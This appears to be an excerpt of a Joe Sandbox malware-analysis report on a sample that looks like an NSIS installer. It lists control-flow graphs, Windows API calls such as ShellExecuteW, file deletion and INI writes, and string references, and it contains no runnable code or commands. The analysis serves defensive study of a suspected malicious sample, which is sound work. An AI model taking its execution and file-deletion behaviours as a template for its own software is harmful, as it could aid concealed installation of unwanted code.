                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                                            • String ID: <RM>$ReturningPreferencesWrightWhy$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                                                            • API String ID: 247603264-1512163661

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425D19,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425D19,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                                            • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d

Control-flow Graph
• Block 838 (405eab-405eb7) → 839
• Block 839 (405eb8-405eec; GetTickCount, GetTempFileNameW) → 840, 841
• Block 840 (405efb-405efd) → 843
• Block 841 (405eee-405ef0) → 839, 842
• Block 842 (405ef2) → 843
• Block 843 (405ef5-405ef8)
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                                            • String ID: nsa
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: HideWindow
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
Memory Dump Source
• Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• GetDlgItem.USER32(?,000003F9), ref: 004049BF
• GetDlgItem.USER32(?,00000408), ref: 004049CC
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
• LoadBitmapW.USER32(0000006E), ref: 00404A2E
• SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
• ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
• SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
• DeleteObject.GDI32(?), ref: 00404AA5
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
• GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
• ShowWindow.USER32(?,00000005), ref: 00404BFB
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
• ImageList_Destroy.COMCTL32(?), ref: 00404DC8
• GlobalFree.KERNEL32(?), ref: 00404DD8
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
• SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
• InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
• ShowWindow.USER32(?,00000000), ref: 00404F75
• GetDlgItem.USER32(?,000003FE), ref: 00404F80
• ShowWindow.USER32(00000000), ref: 00404F87
Strings
Memory Dump Source
• Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $ @$M$N
• API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                                            • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                                            • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                                            • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                                            • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                                            • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(: Completed,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 004046B2
                                                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425D19,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                                            • String ID: : Completed$A
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                                            • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425D19,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(: Completed,00445D80,?,00000000,00404FD5,00445D80,00000000,00425D19,759223A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                                            • String ID: : Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                                            • API String ID: 3581403547-2549942501
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                                            • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
